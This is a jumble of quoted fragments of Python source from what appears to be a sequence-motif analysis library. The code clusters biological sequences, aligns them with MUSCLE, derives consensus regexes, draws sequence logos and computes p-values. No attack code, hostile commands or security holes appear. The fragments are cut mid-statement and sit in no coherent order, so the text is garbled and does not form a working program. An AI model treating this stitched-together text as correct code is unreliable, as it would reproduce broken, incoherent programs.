"(av, st) txt.append(info) txt.append(self._wrap_image(figname, fill_width=False, output_type=output_type)) regex_i = motives[cluster_id]['regex_seq'] figname = plot_location( regex_i,",
"error_bars=True, title='', figure_label='', show_x_axis=True, x_label='', show_y_axis=True, y_label='', y_axis_tic_spacing=1.0, show_ends=False, # ['auto','base','pairing','charge','chemistry','classic','monochrome'] color_scheme='classic', resolution=96,",
"= dict() for cluster_id in clusters: start_time = time.time() # align with muscle",
"import IUPAC from Bio.Seq import Seq from Bio.SeqRecord import SeqRecord from corebio.seq import",
"Bio.Align.Applications import MuscleCommandline from Bio.Alphabet import IUPAC from Bio.Seq import Seq from Bio.SeqRecord",
"pos_seqs=None, neg_seqs=None): \"\"\"performance.\"\"\" try: y_pred, y_binary, y_test = multiprocess_performance( pos_seqs, neg_seqs, vectorizer=self.vectorizer, estimator=self.estimator,",
"else: figname = None plt.show() plt.close() return figname def extract_location(needle, haystack): \"\"\"extract_location.\"\"\" locs",
"'png': return wbl.png_formatter(data, format) elif self.output_format == 'png_print': return wbl.png_print_formatter(data, format) elif self.output_format",
"orders def _compute_consensus_seq(self, align_seqs): cluster = [] for h, align_seq in align_seqs: str_list",
"logger.debug('Exception', exc_info=True) def _decompose_header(self, header): score = header.split('<score>')[1] score = float(score) loc =",
"random_state self.a = -4 self.b = 1 def ecdf(self, x): \"\"\"Empirical cumulative distribution",
"subseq_seq = subarray['subarray_string'] begin = subarray['begin'] end = subarray['end'] score = subarray['score'] header",
"seq += k[0][0] return seq def _compute_score(self, align_seqs, min_freq=0.8): dim = len(align_seqs) cluster",
"cluster_id in motives: regex_seq = motives[cluster_id]['regex_seq'] counts, freq = occurrences(regex_seq, seqs) motives[cluster_id]['freq'] =",
"options.resolution = resolution if fineprint: options.fineprint = fineprint self.options = options self.output_format =",
"centers[i]: for c_j in centers[j]: if selected_abs == abs(c_i - c_j): selected =",
"seq: yield seq # ------------------------------------------------------------------------------ class MuscleAlignWrapper(object): \"\"\"A wrapper to perform Muscle Alignment",
"break # TODO: run the predictor to learn the new class definition logger.debug('After",
"= time.time() # align with muscle is_high_quality, motif = self.compute_motif( seqs=clusters[cluster_id], min_score=min_score, min_freq=min_freq,",
"defaultdict(list) for begin, end, cluster_id in seqs_summary[seq_id]: centers[cluster_id].append(begin + (end - begin) /",
"i in range(half_windw_size, sig_len - half_windw_size): min_sig = np.min(sig[i - half_windw_size:i + half_windw_size])",
"size=(6, 2), fname=None): \"\"\"plot_cumulative_score.\"\"\" sig = cumulative_score(seqs, smod) plt.figure(figsize=size) sigp = np.copy(sig) sigp[sigp",
"subseq = components p = self.compute_p_value(score) if p <= p_value: yield orig_header, begin,",
"estimator=self.estimator, block_size=self.pos_block_size, n_jobs=self.n_jobs): yield score except Exception as e: logger.debug('Failed iteration. Reason: %s'",
"freq = occurrences(c_regex, seqs) yield freq, id, c_regex, counts, motives[id]['consensus_seq'] def plot_location(needle, haystack,",
"size=(17, 2), output_type='screen', fname=None): \"\"\"Report in markdown format.\"\"\" txt = [] if motives:",
"distances def plot_distance(cluster_id_i, cluster_id_j, regex_i, regex_j, distances, nbins=5, size=(6, 2), fname=None): \"\"\"plot_distance.\"\"\" ds",
"if output_type == 'pdf': txt.append('<p align=\"left\"><img src=\"file://' + url + '\" style=\"width: 100%\"></p>')",
"output_type=output_type)) txt.append('_' * 100) else: logger.warning( 'No motives to report. Try more permissive",
"n_jobs=self.n_jobs) logger.debug('Clustering') logger.debug('working on %d instances' % data_matrix.shape[0]) start_time = time.time() self.clusterer.set_params(n_clusters=self.n_clusters) if",
"i, j def merge(self, motives, similarity_th=0.5, min_score=4, min_freq=0.5, min_cluster_size=10, regex_th=.3, sample_size=200): \"\"\"merge.\"\"\" while",
"= k[0][1] if float(val) / dim >= min_freq: score += 1 trimmed_align_seqs =",
"return True, motif else: return False, None def compute_motives(self, clusters, min_score=4, min_freq=0.6, min_cluster_size=10,",
"cluster_seqs.append(seq) # vectorize the seqs and compute their gram matrix K cluster_vecs =",
"maxhours if alphabet == 'protein': self.alphabet = IUPAC.protein elif alphabet == 'rna': self.alphabet",
"seq_j = motives[j]['consensus_seq'] nw_score = edit_distance(seq_i, seq_j, gap_penalty=-1) rel_nw_score = 2 * nw_score",
"filter, %d motives' % len(_motives)) return _motives def select_motives(self, seqs=None, p_value=0.05, similarity_th=0.5, min_score=4,",
"cluster_ids = set(cluster_ids) for i in cluster_ids: for j in cluster_ids: cooccurence_mtx[i, j]",
"score, begin, end, subseq def decompose(self, seqs=None, p_value=0.05): \"\"\"decomposition_scores.\"\"\" try: subarrays_items = multiprocess_subarray(",
"in lines: if line: if line[0] == '>': if seq: yield seq seq",
"options.show_yaxis = show_y_axis if y_label: options.yaxis_label = y_label options.yaxis_tic_interval = y_axis_tic_spacing options.show_ends =",
"else: preds = self.clusterer.fit_predict(data_matrix) self.class_estimator.fit(data_matrix, preds) self.clusterer_is_fit = True dtime = time.time() -",
"ignore_lower_case=False, # ['bits','nats','digits','kT','kJ/mol','kcal/mol','probability'] units='bits', first_position=1, logo_range=list(), # composition = 'auto', scale_stack_widths=True, error_bars=True, title='',",
"[list(x) for x in zip(*seqs)] instances_seqrecord = [] for i, j in enumerate(instances):",
"% e) logger.debug('Exception', exc_info=True) def score(self, seqs=None): \"\"\"fit.\"\"\" try: for score in multiprocess_score(seqs,",
"estimator=None, min_subarray_size=5, max_subarray_size=10, block_size=100, n_jobs=-1): \"\"\"multiprocess_subarray.\"\"\" start_time = time.time() if n_jobs == -1:",
"= show_ends options.color_scheme = wbl.std_color_schemes[color_scheme] options.resolution = resolution if fineprint: options.fineprint = fineprint",
"int(end), i) def compute_cooccurence(motives, ids=None): \"\"\"compute_cooccurence.\"\"\" if ids is None: ids = [id",
"ids[i] end = ids[i + 1] width = end - start val =",
"consensus_seq = self._compute_consensus_seq(trimmed_align_seqs) regex_seq = consensus_regex(trimmed_align_seqs, regex_th) motif = {'consensus_seq': consensus_seq, 'regex_seq': regex_seq,",
"set(cluster_ids) for i in cluster_ids: for j in cluster_ids: cooccurence_mtx[i, j] += 1",
"motives, similarity_th=0.8): for i in motives: for j in motives: if j >",
"= int(out[i].split(' ')[0].split('>')[1]) motif_seqs[id] = out[i + 1] return zip(headers, motif_seqs) def transform(self,",
"return code_str def consensus_regex(trimmed_align_seqs, regex_th): \"\"\"consensus_regex.\"\"\" cluster = [] for h, align_seq in",
"and len(align_seqs) > min_cluster_size: return True else: return False def compute_motif(self, seqs=None, min_score=4,",
"%.3f' % (metrics.roc_auc_score(y_test, y_pred))) except Exception as e: logger.debug('Failed iteration. Reason: %s' %",
"cluster = np.vstack(cluster) seq = '' for i, row in enumerate(cluster.T): c =",
"and motives.get(j, None): n_i = len(motives[i]['seqs']) n_j = len(motives[j]['seqs']) seqs = motives[i]['seqs'] +",
"ecdf(scores) popt, pcov = curve_fit(sigmoid, xs, ys) self.a, self.b = popt else: logger.debug('Warning:",
"style=\"width: 100%\"></p>') else: txt.append('<p align=\"left\"><img src=\"' + fname + '\" style=\"width: 100%\"></p>') else:",
"as f: f.write(logo) return imagename def _wrap_image(self, fname, fill_width=True, output_type='screen'): pwd = os.getcwd()",
"logger.info('Confusion matrix:') logger.info(cm) # classification logger.info('Classification:') logger.info(metrics.classification_report(y_test, y_binary)) # roc logger.info('ROC: %.3f' %",
"data_matrix = vstack(matrices) return data_matrix def multiprocess_fit(pos_iterable, neg_iterable, vectorizer=None, estimator=None, pos_block_size=100, neg_block_size=100, n_jobs=-1):",
"import defaultdict from eden import apply_async import numpy as np from scipy.sparse import",
"def multiprocess_performance(pos_iterable, neg_iterable, vectorizer=None, estimator=None, pos_block_size=100, neg_block_size=100, n_jobs=-1): \"\"\"multiprocess_performance.\"\"\" start_time = time.time() if",
"mcs = min_cluster_size logger.debug('Alignment') motives = dict() for cluster_id in clusters: start_time =",
"loc_start_time = time.time() pos_data_matrix = p.get() y = [1] * pos_data_matrix.shape[0] neg_data_matrix =",
"seqs} return True, motif else: return False, None def compute_motives(self, clusters, min_score=4, min_freq=0.6,",
"== sig[i]: yield i def box_decomposition(sig, half_windw_size=5): \"\"\"box_decomposition.\"\"\" ids = list(mean_shift_decomposition(sig, half_windw_size)) for",
"= options self.output_format = output_format def create_logo(self, seqs=[]): \"\"\"Create sequence logo for input",
"for j in motives: if j > i: seq_i = motives[i]['consensus_seq'] seq_j =",
"in markdown format.\"\"\" txt = [] if motives: _, norm_cooccurence_mtx, distances = compute_cooccurence(motives)",
"consensus sequence: %s' % motif['consensus_seq'] logo_txt.append(info) info = ' - consensus regex: %s'",
"h, s in motives[i]['seqs']: tokens = h.split('<loc>') seq_id = tokens[0] begin, end =",
"pad_inches=0) else: figname = None plt.show() plt.close() return figname # ------------------------------------------------------------------------------ def serial_pre_process(iterable,",
"= cooccurence_mtx.copy() cooccurence_list = [] for i, row in enumerate(cooccurence_mtx): norm = row[i]",
"np.array(scores) if len(sig) != median_len: logger.debug('Length mismatch: %d != %d' % (len(sig), median_len))",
"pool.join() return subarrays_items def serial_score(iterable, vectorizer=None, estimator=None): \"\"\"serial_score.\"\"\" annotated_seqs = vectorizer.annotate(iterable, estimator=estimator) scores",
"stacks_per_line options.sequence_type = sequence_type options.ignore_lower_case = ignore_lower_case options.unit_name = units options.first_index = first_position",
"options.title = title if figure_label: options.logo_label = figure_label options.show_xaxis = show_x_axis if x_label:",
"plot_distance( cluster_id, j, regex_i, regex_j, distances, nbins=nbins, size=size, fname=fname) txt.append(self._wrap_image( figname, output_type=output_type)) txt.append('_'",
"compute_clusters(self, seqs=None, p_value=0.05): \"\"\"compute_clusters.\"\"\" try: subsequences = [] iterable = self.decompose(seqs, p_value=p_value) for",
"= h.split('<loc>') seq_id = tokens[0] begin, end = tokens[1].split(':') yield (seq_id, int(begin), int(end),",
"= None for scores in smod.score(seqs): sig = np.array(scores) if len(sig) != median_len:",
"if not clusters: raise Exception('Error: No clusters.') mcs = min_cluster_size logger.debug('Alignment') motives =",
"= 0 plt.bar(range(len(sign)), sign, alpha=0.3, color='r') plt.grid() plt.xlabel('Position') plt.ylabel('Importance score') if fname: plt.draw()",
"alphabet is required # it over-rides tool.alphabet alphabet='dna', # ['dna', 'rna', 'protein'] ):",
"len(code) == 0: code_str = None elif len(code) == 1: code_str = code[0]",
"align=\"left\"><img src=\"' + fname + '\" style=\"width: 100%\"></p>') else: if output_type == 'pdf':",
"= p.get() subarrays_items += subarrays_item d_time = time.time() - start_time d_loc_time = time.time()",
"+= 1 trimmed_align_seqs = [] for h, align_seq in align_seqs: trimmed_align_seq = [a",
"% (score) header += '<subseq>%s<subseq>' % (subseq_seq) subseq = (header, seq) subseqs.append(subseq) subarrays_items",
"d_loc_time)) pool.close() pool.join() return subarrays_items def serial_score(iterable, vectorizer=None, estimator=None): \"\"\"serial_score.\"\"\" annotated_seqs = vectorizer.annotate(iterable,",
"orders.append(int(id2)) return orders def _compute_consensus_seq(self, align_seqs): cluster = [] for h, align_seq in",
"def mean_shift_decomposition(sig, half_windw_size=5): \"\"\"mean_shift_decomposition.\"\"\" sig_len = len(sig) for i in range(half_windw_size, sig_len -",
"similarity_th=0.5, min_score=4, min_freq=0.5, min_cluster_size=10, regex_th=.3, sample_size=200): \"\"\"merge.\"\"\" while True: ms = sorted([m for",
"orig_clusters = self.compute_clusters(seqs, p_value=p_value) motives = self.compute_motives( orig_clusters, min_score=min_score, min_freq=min_freq, min_cluster_size=min_cluster_size, regex_th=regex_th, sample_size=sample_size)",
"= plot_location( regex_i, all_seqs, cluster_id=cluster_id, nbins=nbins, size=size, fname=fname) txt.append(self._wrap_image(figname, output_type=output_type)) for j in",
"= cumulative_score(seqs, smod) plt.figure(figsize=size) sigp = np.copy(sig) sigp[sigp < 0] = 0 plt.bar(range(len(sigp)),",
"self.compute_motif( seqs=seqs, min_score=min_score, min_freq=min_freq, min_cluster_size=min_cluster_size, regex_th=regex_th, sample_size=sample_size) if is_high_quality: info1 = 'Joining: %d",
"= [apply_async( pool, serial_pre_process, args=(seqs, vectorizer)) for seqs in chunks(pos_iterable, pos_block_size)] neg_results =",
"in align_seqs: str_list = [c for c in align_seq] concat_str = np.array(str_list, dtype=np.dtype('a'))",
"txt.append(info) figname = plot_cumulative_score( self, pos_seqs, size=size, fname=fname) txt.append(self._wrap_image(figname, output_type=output_type)) for freq, cluster_id",
"min_subarray_size=min_subarray_size, max_subarray_size=max_subarray_size, margin=1, output='all') subseqs = [] for subarray in subarrays: subseq_seq =",
"= False for rel_nw_score, i, j in ms: if motives.get(i, None) and motives.get(j,",
"' - num occurrences of regex: %d' % (co) txt.append(info) info = '",
"fragments' % len(subsequences)) n = multiprocessing.cpu_count() pos_block_size = len(subsequences) / n data_matrix =",
"SeqList import weblogolib as wbl from scipy.cluster.hierarchy import linkage import regex as re",
"Vectorizer from StringIO import StringIO from Bio import SeqIO from Bio.Align.Applications import MuscleCommandline",
"- consensus regex: %s' % motif['regex_seq'] logo_txt.append(info) return logo_image, logo_txt def compute_logos(self, motives,",
"len(sig) != median_len: logger.debug('Length mismatch: %d != %d' % (len(sig), median_len)) if sigs",
"for i, p in enumerate(results): loc_start_time = time.time() pos_data_matrix = p.get() matrices +=",
"stdout) return aligned_seqs # ------------------------------------------------------------------------------ class Weblogo(object): \"\"\"A wrapper of weblogolib for creating",
"load(self, obj): \"\"\"load.\"\"\" self.__dict__.update(joblib.load(obj).__dict__) def fit(self, pos_seqs=None, neg_seqs=None): \"\"\"fit.\"\"\" try: self.estimator = multiprocess_fit(",
"= ' deleting: %d [%d is now #%d]' % \\ (j, i, n_i",
"= np.arange(1, len(xs) + 1) / float(len(xs)) return xs, ys def fit(self, scores):",
"consensus_seq, 'regex_seq': regex_seq, 'trimmed_align_seqs': trimmed_align_seqs, 'align_seqs': align_seqs, 'seqs': seqs} return True, motif else:",
"+ fname + '\" style=\"width: 100%\"></p>') else: if output_type == 'pdf': txt.append('<p align=\"left\"><img",
"compute_logo(self, cluster_id=None, motif=None): \"\"\"compute_logo.\"\"\" alphabet = 'rna' color_scheme = 'classic' wb = Weblogo(output_format='png',",
"is 'protein': alphabet = Alphabet('ACDEFGHIKLMNPQRSTVWY') else: alphabet = Alphabet('AGCT') motif_corebio = SeqList(alist=instances, alphabet=alphabet)",
"h, s in haystack: matches = re.findall(needle, s, overlapped=True) if len(matches): yield 1",
"= [] for i, p in enumerate(results): loc_start_time = time.time() subarrays_item = p.get()",
"transparent=True, pad_inches=0) else: figname = None plt.show() plt.close() return figname # ------------------------------------------------------------------------------ def",
"in enumerate(izip(pos_results, neg_results)): loc_start_time = time.time() pos_data_matrix = p.get() y = [1] *",
"enumerate(results): loc_start_time = time.time() pos_data_matrix = p.get() matrices += pos_data_matrix d_time = time.time()",
"min_cluster_size=min_cluster_size, regex_th=regex_th, sample_size=sample_size) motives = self.merge( motives, similarity_th=similarity_th, min_score=min_score, min_freq=min_freq, min_cluster_size=min_cluster_size, regex_th=regex_th, sample_size=sample_size)",
"k[0][0] == '-': to_be_removed.append(i) val = k[1][1] else: val = k[0][1] if float(val)",
"plt.xlabel('Position') plt.ylabel('Num occurrences') if fname: plt.draw() figname = '%s_loc_%d.png' % (fname, cluster_id) plt.savefig(",
"min_score=min_score, min_freq=min_freq, min_cluster_size=min_cluster_size, regex_th=regex_th, sample_size=sample_size) motives = self.quality_filter( seqs, motives, freq_th=freq_th, std_th=std_th) return",
"j, n_j, rel_nw_score) info2 = ' deleting: %d [%d is now #%d]' %",
"m = s + (e - s) / 2 locs.append(m) if locs: avg_loc",
"== 'rna': self.alphabet = IUPAC.unambiguous_rna else: self.alphabet = IUPAC.unambiguous_dna def _seq_to_stdin_fasta(self, seqs): #",
"alphabet='dna', # ['dna', 'rna', 'protein'] ): \"\"\"Initialize an instance.\"\"\" self.diags = diags self.maxiters",
"(logo_image, logo_txt) return logos else: logger.warning( 'No logo to compute. Try more permissive",
"multiprocess_performance(pos_iterable, neg_iterable, vectorizer=None, estimator=None, pos_block_size=100, neg_block_size=100, n_jobs=-1): \"\"\"multiprocess_performance.\"\"\" start_time = time.time() if n_jobs",
"model_name, compress=1) def load(self, obj): \"\"\"load.\"\"\" self.__dict__.update(joblib.load(obj).__dict__) def fit(self, pos_seqs=None, neg_seqs=None): \"\"\"fit.\"\"\" try:",
"data_matrix def multiprocess_fit(pos_iterable, neg_iterable, vectorizer=None, estimator=None, pos_block_size=100, neg_block_size=100, n_jobs=-1): \"\"\"multiprocess_fit.\"\"\" start_time = time.time()",
"estimator=estimator) scores = [score for seq, score in annotated_seqs] return scores def multiprocess_score(iterable,",
"in range(len(out[:-1]))[::2]: id = int(out[i].split(' ')[0].split('>')[1]) motif_seqs[id] = out[i + 1] return zip(headers,",
"'trimmed_align_seqs': trimmed_align_seqs, 'align_seqs': align_seqs, 'seqs': seqs} return True, motif else: return False, None",
"min(d_ij) for c_i in centers[i]: for c_j in centers[j]: if selected_abs == abs(c_i",
"score, begin, end, subseq = components p = self.compute_p_value(score) if p <= p_value:",
"logger.debug('Failed iteration. Reason: %s' % e) logger.debug('Exception', exc_info=True) def score(self, seqs=None): \"\"\"fit.\"\"\" try:",
"[] for h, align_seq in align_seqs: trimmed_align_seq = [a for i, a in",
"sample_size=sample_size) if is_high_quality: motives[cluster_id] = motif dtime = time.time() - start_time logger.debug( 'Cluster",
"scores_items += scores d_time = time.time() - start_time d_loc_time = time.time() - loc_start_time",
"txt.append(info) logo_image, logo_txts = self.compute_logo( cluster_id, motif=motives[cluster_id]) figname = self._save_logo(logo_image, cluster_id, fname) for",
"rel_nw_score = 2 * nw_score / (len(seq_i) + len(seq_j)) if rel_nw_score > similarity_th:",
"xs, ys) self.a, self.b = popt else: logger.debug('Warning: reverting to default values') logger.debug('ECDF",
"seq seq = \"\" line_str = str(line) yield line_str.strip() else: line_str = line.split()",
"new_header += str(end) + '<loc>' subsequences.append((new_header, subseq)) if not subsequences: raise Exception('No subarray",
"distances = compute_cooccurence(motives) info = '### Summary: %d motives' % len(motives) txt.append(info) figname",
"= ' - num occurrences of regex: %d' % (co) txt.append(info) info =",
"vs %d %s: %d' % \\ (cluster_id, regex_i, j, regex_j, len(ds)) txt.append(info) if",
"orig_header, begin, end, p, subseq except Exception as e: logger.debug('Failed iteration. Reason: %s'",
"in align_seqs: trimmed_align_seq = [a for i, a in enumerate(align_seq) if i not",
"= self._save_logo(logo_image, cluster_id, fname) for logo_txt in logo_txts: txt.append(logo_txt) co = motives[cluster_id]['counts'] fr",
"start val = sum(sig[start:end]) yield val, start, end, width def cumulative_score(seqs, smod): \"\"\"cumulative_score.\"\"\"",
"- num occurrences of regex: %d' % (co) txt.append(info) info = ' -",
"\"\"\"Create sequence logo for input sequences.\"\"\" # seperate headers headers, instances = [list(x)",
"%d motives' % len(motives) txt.append(info) figname = plot_cumulative_score( self, pos_seqs, size=size, fname=fname) txt.append(self._wrap_image(figname,",
"% (time.time() - start_time)) logger.debug('Performance evaluation') start_time = time.time() preds = [] binary_preds",
"weblogolib for creating sequence.\"\"\" def __init__(self, output_format='png', # ['eps','png','png_print','jpeg'] stacks_per_line=40, sequence_type='dna', # ['protein','dna','rna']",
"logger.debug('Working on: %d fragments' % len(subsequences)) n = multiprocessing.cpu_count() pos_block_size = len(subsequences) /",
"motif=motives[cluster_id]) figname = self._save_logo(logo_image, cluster_id, fname) for logo_txt in logo_txts: txt.append(logo_txt) co =",
"= None plt.show() plt.close() return figname def extract_location(needle, haystack): \"\"\"extract_location.\"\"\" locs = []",
"def compute_cooccurence(motives, ids=None): \"\"\"compute_cooccurence.\"\"\" if ids is None: ids = [id for id",
"options.show_errorbars = error_bars if title: options.title = title if figure_label: options.logo_label = figure_label",
"yield orig_header, begin, end, p, subseq except Exception as e: logger.debug('Failed iteration. Reason:",
"0 cooccurence_list.append(row) norm_cooccurence_mtx = np.vstack(cooccurence_list) return orig_cooccurence_mtx, norm_cooccurence_mtx, distances def plot_distance(cluster_id_i, cluster_id_j, regex_i,",
"return wbl.eps_formatter(data, format) # ------------------------------------------------------------------------------ class SequenceMotifDecomposer(BaseEstimator, ClassifierMixin): \"\"\"SequenceMotifDecomposer.\"\"\" def __init__(self, complexity=5, n_clusters=10,",
"'jpeg': return wbl.jpeg_formatter(data, format) else: return wbl.eps_formatter(data, format) # ------------------------------------------------------------------------------ class SequenceMotifDecomposer(BaseEstimator, ClassifierMixin):",
"# ['bits','nats','digits','kT','kJ/mol','kcal/mol','probability'] units='bits', first_position=1, logo_range=list(), # composition = 'auto', scale_stack_widths=True, error_bars=True, title='', figure_label='',",
"centers = defaultdict(list) for begin, end, cluster_id in seqs_summary[seq_id]: centers[cluster_id].append(begin + (end -",
"def plot_distance(cluster_id_i, cluster_id_j, regex_i, regex_j, distances, nbins=5, size=(6, 2), fname=None): \"\"\"plot_distance.\"\"\" ds =",
"cluster.append(concat_str) cluster = np.vstack(cluster) seq = '' for i, row in enumerate(cluster.T): c",
"binary_preds = [] true_targets = [] for i, (p, n) in enumerate(izip(pos_results, neg_results)):",
"# seperate headers headers, instances = [list(x) for x in zip(*seqs)] if self.options.sequence_type",
"if fineprint: options.fineprint = fineprint self.options = options self.output_format = output_format def create_logo(self,",
"logger.debug('Failed iteration. Reason: %s' % e) logger.debug('Exception', exc_info=True) def _order_clusters(self, clusters, complexity=3): sep",
"distribution.\"\"\" def __init__(self, random_state=1): \"\"\"Constructor.\"\"\" self.random_state = random_state self.a = -4 self.b =",
"match.end() m = s + (e - s) / 2 locs.append(m) if locs:",
"subseq def decompose(self, seqs=None, p_value=0.05): \"\"\"decomposition_scores.\"\"\" try: subarrays_items = multiprocess_subarray( seqs, vectorizer=self.vectorizer, estimator=self.estimator,",
"[apply_async( pool, serial_score, args=(seqs, vectorizer, estimator)) for seqs in chunks(iterable, block_size)] logger.debug('Setup %.2f",
"figure_label options.show_xaxis = show_x_axis if x_label: options.xaxis_label = x_label options.show_yaxis = show_y_axis if",
"\"\"\"letter_regex.\"\"\" code = [] for letter, count in k: if count / float(size)",
"%d fragments' % len(subsequences)) n = multiprocessing.cpu_count() pos_block_size = len(subsequences) / n data_matrix",
"'Cluster %d (#%d) (%.2f secs)' % (cluster_id, len(clusters[cluster_id]), dtime)) logger.debug('After motives computation, %d",
"'#### Motif id: %d' % cluster_id txt.append(info) logo_image, logo_txts = self.compute_logo( cluster_id, motif=motives[cluster_id])",
"np.zeros(row.shape) row[i] = 0 cooccurence_list.append(row) norm_cooccurence_mtx = np.vstack(cooccurence_list) return orig_cooccurence_mtx, norm_cooccurence_mtx, distances def",
"options.scale_width = scale_stack_widths options.show_errorbars = error_bars if title: options.title = title if figure_label:",
"logger.debug('Length mismatch: %d != %d' % (len(sig), median_len)) if sigs is None: if",
"j in ms: if motives.get(i, None) and motives.get(j, None): n_i = len(motives[i]['seqs']) n_j",
"np from scipy.sparse import vstack from eden.util.iterated_maximum_subarray import compute_max_subarrays_sequence from itertools import izip",
"show_x_axis=True, x_label='', show_y_axis=True, y_label='', y_axis_tic_spacing=1.0, show_ends=False, # ['auto','base','pairing','charge','chemistry','classic','monochrome'] color_scheme='classic', resolution=96, fineprint='', ): \"\"\"Initialize",
"= None plt.show() plt.close() return figname def mean_shift_decomposition(sig, half_windw_size=5): \"\"\"mean_shift_decomposition.\"\"\" sig_len = len(sig)",
"motif_seqs[id] = out[i + 1] return zip(headers, motif_seqs) def transform(self, seqs=[]): \"\"\"Carry out",
"logger.debug('Exception', exc_info=True) def fit_decomposition(self, seqs=None): \"\"\"fit_decomposition.\"\"\" self.a, self.b = -4, 1 scores =",
"motives def compute_logo(self, cluster_id=None, motif=None): \"\"\"compute_logo.\"\"\" alphabet = 'rna' color_scheme = 'classic' wb",
"== 0: logger.warning('Quality filter is too strict. Ignoring filter.') return motives else: logger.debug('After",
"multiprocess_subarray( seqs, vectorizer=self.vectorizer, estimator=self.estimator, min_subarray_size=self.min_subarray_size, max_subarray_size=self.max_subarray_size, block_size=self.pos_block_size, n_jobs=self.n_jobs) for header, seq in subarrays_items:",
"pool, serial_pre_process, args=(seqs, vectorizer)) for seqs in chunks(pos_iterable, pos_block_size)] neg_results = [apply_async( pool,",
"score except Exception as e: logger.debug('Failed iteration. Reason: %s' % e) logger.debug('Exception', exc_info=True)",
"(len(sig), median_len)) if sigs is None: if len(sig) >= median_len: sigs = sig[:median_len]",
"values' % (len(scores))) logger.debug('Optimal params: a:%.2f b:%.2f' % (self.a, self.b)) def compute_p_value(self, value):",
"= min_subarray_size self.max_subarray_size = max_subarray_size self.pos_block_size = pos_block_size self.neg_block_size = neg_block_size self.n_jobs =",
"info = ' - freq of occurrences of regex: %.2f' % (fr) txt.append(info)",
"None: params['maxhours'] = self.maxhours muscle_cline = MuscleCommandline(**params) stdout, stderr = muscle_cline(stdin=data) return stdout",
"if line[0] == '>': if seq: yield seq seq = \"\" line_str =",
"n_jobs=self.n_jobs): yield score except Exception as e: logger.debug('Failed iteration. Reason: %s' % e)",
"100%\"></p>') else: if output_type == 'pdf': txt.append('<p align=\"left\"><img src=\"file://' + url + '\"></p>')",
"pylab as plt import joblib from scipy.optimize import curve_fit import multiprocessing logger =",
"time.time() scores_items = [] for i, p in enumerate(results): loc_start_time = time.time() scores",
"True: params['diags'] = True if self.maxhours is not None: params['maxhours'] = self.maxhours muscle_cline",
"regex_th=regex_th, sample_size=sample_size) if is_high_quality: motives[cluster_id] = motif dtime = time.time() - start_time logger.debug(",
"-1]) if n_jobs == -1: pool = mp.Pool() else: pool = mp.Pool(n_jobs) pos_results",
"mp.Pool(n_jobs) results = [apply_async( pool, serial_score, args=(seqs, vectorizer, estimator)) for seqs in chunks(iterable,",
"iteration. Reason: %s' % e) logger.debug('Exception', exc_info=True) def score(self, seqs=None): \"\"\"fit.\"\"\" try: for",
"d_loc_time)) pool.close() pool.join() preds = np.hstack(preds) binary_preds = np.hstack(binary_preds) true_targets = np.hstack(true_targets) return",
"subseqs = [] for subarray in subarrays: subseq_seq = subarray['subarray_string'] begin = subarray['begin']",
"else: return False, None def compute_motives(self, clusters, min_score=4, min_freq=0.6, min_cluster_size=10, regex_th=.3, sample_size=200): \"\"\"compute_motives.\"\"\"",
"eden.util.NeedlemanWunsh import edit_distance import random import pylab as plt import joblib from scipy.optimize",
"self.diags is True: params['diags'] = True if self.maxhours is not None: params['maxhours'] =",
"avg motives[cluster_id]['std_pos'] = std if freq_th is None or freq >= freq_th: if",
"= loc.split(':') begin = int(begin) end = int(end) subseq = header.split('<subseq>')[1] orig_header =",
"= len(sig) for i in range(half_windw_size, sig_len - half_windw_size): min_sig = np.min(sig[i -",
"= self.class_estimator.predict(data_matrix) else: preds = self.clusterer.fit_predict(data_matrix) self.class_estimator.fit(data_matrix, preds) self.clusterer_is_fit = True dtime =",
"return p_val def ecdf(x): \"\"\"Empirical cumulative distribution function.\"\"\" xs = np.sort(x) ys =",
"if line_str: seq += str(line_str[0]).strip() if seq: yield seq # ------------------------------------------------------------------------------ class MuscleAlignWrapper(object):",
"= motives[cluster_id]['avg_pos'] st = motives[cluster_id]['std_pos'] info = ' - average location: %.1f +-",
"enumerate(instances): instances_seqrecord.append( SeqRecord(Seq(j, self.alphabet), id=str(i))) handle = StringIO() SeqIO.write(instances_seqrecord, handle, \"fasta\") data =",
"secs' % (time.time() - start_time)) logger.debug('Predicting') start_time = time.time() scores_items = [] for",
"p_value=0.05): \"\"\"compute_clusters.\"\"\" try: subsequences = [] iterable = self.decompose(seqs, p_value=p_value) for header, begin,",
"Reason: %s' % e) logger.debug('Exception', exc_info=True) def decomposition_scores(self, seqs=None): \"\"\"decomposition_scores.\"\"\" try: subarrays_items =",
"counts, freq = occurrences(c_regex, seqs) yield freq, id, c_regex, counts, motives[id]['consensus_seq'] def plot_location(needle,",
"else: logger.warning( 'No motives to report. Try more permissive parameters.') txt = '\\n'.join(txt)",
"False def save(self, model_name): \"\"\"save.\"\"\" joblib.dump(self, model_name, compress=1) def load(self, obj): \"\"\"load.\"\"\" self.__dict__.update(joblib.load(obj).__dict__)",
"def sigmoid(x, a, b): \"\"\"sigmoid.\"\"\" return 1 / (1 + np.exp(-(x - a)",
"None: ids = [id for id in motives] seqs_summary = defaultdict(list) for seq_id,",
"src=\"file://' + url + '\" style=\"width: 100%\"></p>') else: txt.append('<p align=\"left\"><img src=\"' + fname",
"in enumerate(results): loc_start_time = time.time() scores = p.get() scores_items += scores d_time =",
"in to_be_removed] trimmed_align_seqs.append((h, ''.join(trimmed_align_seq))) return score, trimmed_align_seqs def _is_high_quality(self, seqs, min_score=4, min_freq=0.6, min_cluster_size=10,",
"roc logger.info('ROC: %.3f' % (metrics.roc_auc_score(y_test, y_pred))) except Exception as e: logger.debug('Failed iteration. Reason:",
"h, s in haystack: for match in re.finditer(needle, s): s = match.start() e",
"over-rides tool.alphabet alphabet='dna', # ['dna', 'rna', 'protein'] ): \"\"\"Initialize an instance.\"\"\" self.diags =",
"def decomposition_scores(self, seqs=None): \"\"\"decomposition_scores.\"\"\" try: subarrays_items = multiprocess_subarray( seqs, vectorizer=self.vectorizer, estimator=self.estimator, min_subarray_size=self.min_subarray_size, max_subarray_size=self.max_subarray_size,",
"s in clusters[cluster_id]] seq = sep.join(seqs) cluster_seqs.append(seq) # vectorize the seqs and compute",
"in subarrays_items: components = self._decompose_header(header) orig_header, score, begin, end, subseq = components p",
"import edit_distance import random import pylab as plt import joblib from scipy.optimize import",
"(self.a, self.b)) def predict(self, value): \"\"\"pvalue.\"\"\" y = sigmoid(value, self.a, self.b) p_val =",
"n) in enumerate(izip(pos_results, neg_results)): loc_start_time = time.time() pos_data_matrix = p.get() y = [1]",
"% (time.time() - start_time)) logger.debug('Predicting') start_time = time.time() scores_items = [] for i,",
